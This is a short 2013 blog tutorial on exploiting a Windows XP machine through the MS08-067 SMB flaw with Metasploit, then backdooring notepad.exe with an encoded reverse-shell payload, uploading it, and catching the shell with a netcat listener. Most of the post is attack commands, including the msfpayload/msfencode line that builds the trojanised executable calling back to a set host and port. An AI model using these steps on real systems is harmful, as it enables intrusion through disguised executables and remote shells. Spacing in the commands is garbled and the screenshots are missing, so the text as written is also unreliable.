Tuesday, 5 February 2013

Client Side Attack With Notepad

My first exploit windows using msfconsole, look like the following


then type the following command:
# Search smb

In this case, I would use smb, the display will look like this




module would I use "exploit/windows/smb/ms08_067_netapi", and payload would I use "windows / meterpreter / reverse_tcp" display will look like the following



to fill in the IP of my RHOST victim (in this case Windows XP), then LHOST is the IP of the host (in this case Backtrack R3) the display will look like this




then type the following command
# exploit

display will look like the following


Now we have entered in the windows through windows system weaknesses, ie smb.

Then type the following command
# Download notepad.exe

look like the following


automatically downloaded files from the windows before going into "home",

after that open a new terminal, and go to the folder / opt/metasploit/msf3 / then type the following command
# msfpayload-l

display looks like the following


after that if you want to know more about its syntax syntax, use the command
# msfpayload-h

direct only, type the following command
# Msfpayload windows / shell_reverse_tcp LHOST = 192.168.56.1 LPORT = 5555 R | msfencode-t exe-x / root / notepad.exe-o / media / Eddy / DataBase / notepad.exe-e-c-k x86/shikata_ga_nai 5

look like the following


then we upload to the windows, through the first terminal,

to upload command, type the following command:
# Uploads / media / Eddy / DataBase / notepad.exe C: \

display will look like the following


after that window open windows to see if notepad.exe is already on C:
if you already have the display will look like this


then open a second terminal type the following command
# Nc-l-v-p 5555

windows and open windows, go on explore select C: notepad.exe in double click

notepad will open then back to terminal 2 on the backtrack to see what happens when we run straight into notepad.exe on Windows systems, because it is we inject notepad.exe and have been given payload.

Display looks like the following



ok good try, & good luck

0 comments:

Post a Comment